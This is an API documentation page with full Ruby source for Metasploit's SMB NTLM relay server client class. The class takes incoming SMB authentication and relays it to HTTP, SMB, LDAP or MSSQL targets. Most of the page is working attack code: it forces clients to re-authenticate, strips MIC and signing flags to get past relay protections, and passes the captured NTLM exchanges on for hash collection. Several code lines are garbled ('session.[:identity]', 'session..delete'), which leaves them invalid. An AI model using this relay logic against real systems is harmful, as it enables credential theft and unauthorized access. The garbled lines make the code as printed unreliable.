Class: Msf::Exploit::Remote::SMB::Relay::NTLM::ServerClient

Inherits:
RubySMB::Server::ServerClient
  • Object
show all
Defined in:
lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb

Overview

This class represents a single connected client to the server. It stores and processes connection specific related information. Has overridden methods than allow smb relay attacks.

Constant Summary collapse

FORCE_RETRY_SESSION_SETUP =

The NT Status that will cause a client to reattempt authentication

::WindowsError::NTStatus::STATUS_NETWORK_SESSION_EXPIRED

Instance Method Summary collapse

Constructor Details

#initialize(server, dispatcher, relay_timeout:, relay_targets:, listener:) ⇒ ServerClient

Returns a new instance of ServerClient.

Parameters:



12
13
14
15
16
17
18
19
# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb', line 12

def initialize(server, dispatcher, relay_timeout:, relay_targets:, listener:)
  super(server, dispatcher)

  @timeout = relay_timeout
  @relay_targets = relay_targets
  @relay_timeout = relay_timeout
  @listener = listener
end

Instance Method Details

#create_relay_client(target, timeout) ⇒ Object



284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb', line 284

def create_relay_client(target, timeout)
  case target.protocol
  when :http, :https
    client = Target::HTTP::Client.create(self, target, logger, timeout)
  when :smb
    client = Target::SMB::Client.create(self, target, logger, timeout)
  when :ldap
    client = Target::LDAP::Client.create(self, target, logger, timeout)
  when :mssql
    client = Target::MSSQL::Client.create(self, target, logger, timeout, framework_module: @listener)
  else
    raise RuntimeError, "unsupported protocol: #{target.protocol}"
  end

  client
rescue ::Rex::ConnectionTimeout => e
  msg = "Timeout error retrieving server challenge from target #{target}. Most likely caused by unresponsive target"
  elog(msg, error: e)
  logger.print_error msg
  nil
rescue ::Exception => e
  msg = "Unable to create relay to #{target}"
  elog(msg, error: e)
  logger.print_error msg
  nil
end

#do_session_setup_smb2(request, session) ⇒ Object



73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb', line 73

def do_session_setup_smb2(request, session)
  # TODO: Add shared helper for grabbing session lookups
  session_id = request.smb2_header.session_id
  if session_id == 0
    session_id = rand(1..0xfffffffe)
    session = @session_table[session_id] = ::RubySMB::Server::Session.new(session_id)
  else
    session = @session_table[session_id]
    if session.nil?
      response = SMB2::Packet::ErrorPacket.new
      response.smb2_header.nt_status = WindowsError::NTStatus::STATUS_USER_SESSION_DELETED
      return response
    end
  end

  # Prepare the relay now, if there's only one target to relay to and this is the first session setup message
  if @relay_targets && @relay_targets.each.size == 1 && request.smb2_header.message_id == 1
    session.[:relay_target] = @relay_targets.next(session.[:identity])
    prepare_relay(session)
  end

  # Perform a normal setup flow with ruby_smb
  unless session&.[:relay_mode]
    response = super
    session.[:identity] = session.user_id

    # TODO: Remove guest flag
    return response
  end

  relay_result = self.relay_ntlmssp(session, request.buffer.to_binary_s)
  return if relay_result.nil?

  response = ::RubySMB::SMB2::Packet::SessionSetupResponse.new
  response.smb2_header.credits = 1
  response.smb2_header.message_id = request.smb2_header.message_id
  response.smb2_header.session_id = session_id

  response.smb2_header.nt_status = relay_result.nt_status.value
  if relay_result.nt_status == ::WindowsError::NTStatus::STATUS_MORE_PROCESSING_REQUIRED
    response.smb2_header.nt_status = ::WindowsError::NTStatus::STATUS_MORE_PROCESSING_REQUIRED.value
    if relay_result.message && session.[:ntlm_wrapper] == :none
      response.buffer = relay_result.message.serialize
    elsif relay_result.message && session.[:ntlm_wrapper] == :gss_spnego
      response.buffer = RubySMB::Gss.gss_type2(relay_result.message.serialize)
    end

    if @dialect == '0x0311'
      update_preauth_hash(response)
    end

    return response
  end

  update_preauth_hash(request) if @dialect == '0x0311'
  if relay_result.nt_status == WindowsError::NTStatus::STATUS_SUCCESS
    response.smb2_header.credits = 32
    session.state = :valid
    session.user_id = session.[:identity]
    # TODO: This is invalid now with the relay logic in place
    session.key = @gss_authenticator.session_key
    session.signing_required = request.security_mode.signing_required == 1
  elsif relay_result.nt_status == WindowsError::NTStatus::STATUS_MORE_PROCESSING_REQUIRED && @dialect == '0x0311'
    update_preauth_hash(response)
  end

  response
end

#do_tree_connect_smb2(request, session) ⇒ Object



44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb', line 44

def do_tree_connect_smb2(request, session)
  logger.print_status("Received request for #{session.[:identity]}")
  # Attempt to select the next target to relay to
  session.[:relay_target] = @relay_targets.next(session.[:identity])
  # If there's no more targets to relay to, just tree connect to the currently running server instead
  if session.[:relay_target].nil?
    logger.print_status("Identity: #{session.[:identity]} - All targets relayed to")
    return super(request, session)
  end
  prepare_relay(session)

  response = RubySMB::SMB2::Packet::TreeConnectResponse.new
  response.smb2_header.nt_status = FORCE_RETRY_SESSION_SETUP.value

  response
end

#handle_smb1(raw_request, header) ⇒ RubySMB::GenericPacket

Handle an SMB version 1 message.

Parameters:

  • raw_request (String)

    The bytes of the entire SMB request.

  • header (RubySMB::SMB1::SMBHeader)

    The request header.

Returns:

  • (RubySMB::GenericPacket)

Raises:

  • (NotImplementedError)


67
68
69
70
71
# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb', line 67

def handle_smb1(raw_request, header)
  _port, ip_address = ::Socket::unpack_sockaddr_in(getpeername)
  logger.print_warning("Cannot relay request from #{ip_address}. The SMB1 #{::RubySMB::SMB1::Commands.name(header.command)} command is not supported - https://github.com/rapid7/metasploit-framework/issues/16261")
  raise NotImplementedError
end

#prepare_relay(session) ⇒ Object



21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb', line 21

def prepare_relay(session)
  logger.print_status("Relaying to next target #{session.[:relay_target]}")

  if session.[:relay_target].protocol == :smb && session.[:relay_target].ip == peerhost
    logger.print_warning('Relaying SMB to SMB on the same host will not work if the target has been patched for MS08-068')
  end

  relayed_connection = create_relay_client(
    session.[:relay_target],
    @relay_timeout
  )

  if relayed_connection.nil?
    @relay_targets.on_relay_end(session.[:relay_target], identity: session.[:identity], is_success: false)
    session.[:relay_mode] = false
  else
    session.[:relay_mode] = true
  end

  session.[:relayed_connection] = relayed_connection
  session.state = :in_progress
end

#process_gss_spnego_init(incoming_security_buffer) ⇒ Object



152
153
154
155
156
157
158
159
160
161
# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb', line 152

def process_gss_spnego_init(incoming_security_buffer)
  begin
    gss_init = Rex::Proto::Gss::SpnegoNegTokenInit.parse(incoming_security_buffer)
    ntlm_blob = gss_init.mech_token
    validate_ntlm_blob!(ntlm_blob)
    ntlm_blob
  rescue RASN1::ASN1Error => e
    raise ArgumentError, "Failed to parse NTLMSSP Type1 message from GSS: #{e.message}"
  end
end

#process_gss_spnego_targ(incoming_security_buffer) ⇒ Object



163
164
165
166
167
168
169
170
171
172
# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb', line 163

def process_gss_spnego_targ(incoming_security_buffer)
  begin
    gss_targ = Rex::Proto::Gss::SpnegoNegTokenTarg.parse(incoming_security_buffer)
    ntlm_blob = gss_targ.response_token
    validate_ntlm_blob!(ntlm_blob)
    ntlm_blob
  rescue RASN1::ASN1Error, ArgumentError => e
    raise ArgumentError, "Failed to parse NTLMSSP Type3 message from GSS: #{e.message}"
  end
end

#relay_ntlmssp(session, incoming_security_buffer = nil) ⇒ Object



174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb', line 174

def relay_ntlmssp(session, incoming_security_buffer = nil)
  # TODO: Add support for a default NTLM provider in ruby_smb
  begin
    buf = incoming_security_buffer.to_s.b
    if valid_ntlm_blob?(buf)
      ntlm_message = Net::NTLM::Message.parse(buf)
      session.[:ntlm_wrapper] = :none
    else

      gss_api = OpenSSL::ASN1.decode(buf)
      if gss_api&.tag == 0 && gss_api&.tag_class == :APPLICATION
        incoming_security_buffer = process_gss_spnego_init(incoming_security_buffer)
        ntlm_message = Net::NTLM::Message.parse(incoming_security_buffer)
      elsif gss_api&.tag == 1 && gss_api&.tag_class == :CONTEXT_SPECIFIC
        incoming_security_buffer = process_gss_spnego_targ(incoming_security_buffer)
        ntlm_message = Net::NTLM::Message.parse(incoming_security_buffer)
      end
      session.[:ntlm_wrapper] = :gss_spnego
    end
  rescue ArgumentError, OpenSSL::ASN1::ASN1Error => e
    logger.print_error("Failed to parse incoming NTLM message: #{e.message}")
    return
  end

  # NTLM negotiation request
  # Choose the next machine to relay to, and send the incoming security buffer to the relay target
  if ntlm_message.is_a?(::Net::NTLM::Message::Type1)
    relayed_connection = session.[:relayed_connection]
    logger.info(
      "Relaying NTLM type 1 message to #{relayed_connection.target} "\
      "(Always Sign: #{ntlm_message.has_flag?(:ALWAYS_SIGN)}, "\
      "Sign: #{ntlm_message.has_flag?(:SIGN)}, Seal: #{ntlm_message.has_flag?(:SEAL)})"
    )

    if relayed_connection.target.drop_mic_and_sign_key_exch_flags
      incoming_security_buffer = do_drop_mic_and_flags(ntlm_message)
    elsif relayed_connection.target.drop_mic_only
      incoming_security_buffer = do_drop_mic(ntlm_message)
    end

    relay_result = relayed_connection.relay_ntlmssp_type1(incoming_security_buffer)
    return nil unless relay_result&.nt_status == WindowsError::NTStatus::STATUS_MORE_PROCESSING_REQUIRED

    # Store the incoming negotiation message, i.e. ntlm_type1
    session.[:incoming_negotiate_message] = ntlm_message

    # Store the relay target's server challenge, as it is used later when creating the JTR hash
    session.[:relay_target_server_challenge] = relay_result.message

    relay_result
  # NTLM challenge, which should never be received from a calling client
  elsif ntlm_message.is_a?(::Net::NTLM::Message::Type2)
    RubySMB::Gss::Provider::Result.new(nil, WindowsError::NTStatus::STATUS_LOGON_FAILURE)

  # NTLM challenge response
  elsif ntlm_message.is_a?(::Net::NTLM::Message::Type3)
    relayed_connection = session.[:relayed_connection]
    logger.info("Relaying #{ntlm_message.ntlm_version == :ntlmv2 ? 'NTLMv2' : 'NTLMv1'} type 3 message to #{relayed_connection.target} as #{session.[:identity]}")

    if relayed_connection.target.drop_mic_and_sign_key_exch_flags
      incoming_security_buffer = do_drop_mic_and_flags(ntlm_message)
    elsif relayed_connection.target.drop_mic_only
      incoming_security_buffer = do_drop_mic(ntlm_message)
    end

    relay_result = relayed_connection.relay_ntlmssp_type3(incoming_security_buffer)

    is_success = relay_result&.nt_status == WindowsError::NTStatus::STATUS_SUCCESS
    @relay_targets.on_relay_end(relayed_connection.target, identity: session.[:identity], is_success: is_success)

    if is_success
      logger.print_good("Identity: #{session.[:identity]} - Successfully authenticated against relay target #{relayed_connection.target}")
      session.[:incoming_challenge_response] = ntlm_message

      @listener.on_ntlm_type3(
        address: relayed_connection.target.ip,
        ntlm_type1: session.[:incoming_negotiate_message],
        ntlm_type2: session.[:relay_target_server_challenge],
        ntlm_type3: session.[:incoming_challenge_response]
      )
      @listener.on_relay_success(relay_connection: relayed_connection, relay_identity: session.[:identity])
    else
      @listener.on_relay_failure(relay_connection: relayed_connection)
      relayed_connection.disconnect!

      if relay_result.nil? || relay_result.nt_status.nil?
        logger.print_error("Identity: #{session.[:identity]} - Relay against target #{relayed_connection.target} failed with unknown error")
      elsif relay_result.nt_status == WindowsError::NTStatus::STATUS_LOGON_FAILURE
        logger.print_warning("Identity: #{session.[:identity]} - Relayed client authentication failed on target server #{relayed_connection.target}")
      else
        error_code = WindowsError::NTStatus.find_by_retval(relay_result.nt_status.value).first
        if error_code.nil?
          logger.print_warning("Identity: #{session.[:identity]} - Relay against target #{relayed_connection.target} failed with unexpected error: #{relay_result.nt_status.value}")
        else
          logger.print_warning("Identity: #{session.[:identity]} - Relay against target #{relayed_connection.target} failed with unexpected error: #{error_code.name}: #{error_code.description}")
        end
      end

      session..delete(:relay_mode)
    end

    relay_result

  # Should never occur
  else
    logger.error("Invalid ntlm request")
    RubySMB::Gss::Provider::Result.new(nil, WindowsError::NTStatus::STATUS_LOGON_FAILURE)
  end
end

#valid_ntlm_blob?(blob) ⇒ Boolean

Returns:

  • (Boolean)


142
143
144
# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb', line 142

def valid_ntlm_blob?(blob)
  blob&.start_with?("NTLMSSP\x00")
end

#validate_ntlm_blob!(blob) ⇒ Object



146
147
148
149
150
# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb', line 146

def validate_ntlm_blob!(blob)
  unless valid_ntlm_blob?(blob)
    raise ArgumentError, 'The NTLM blob found was malformed'
  end
end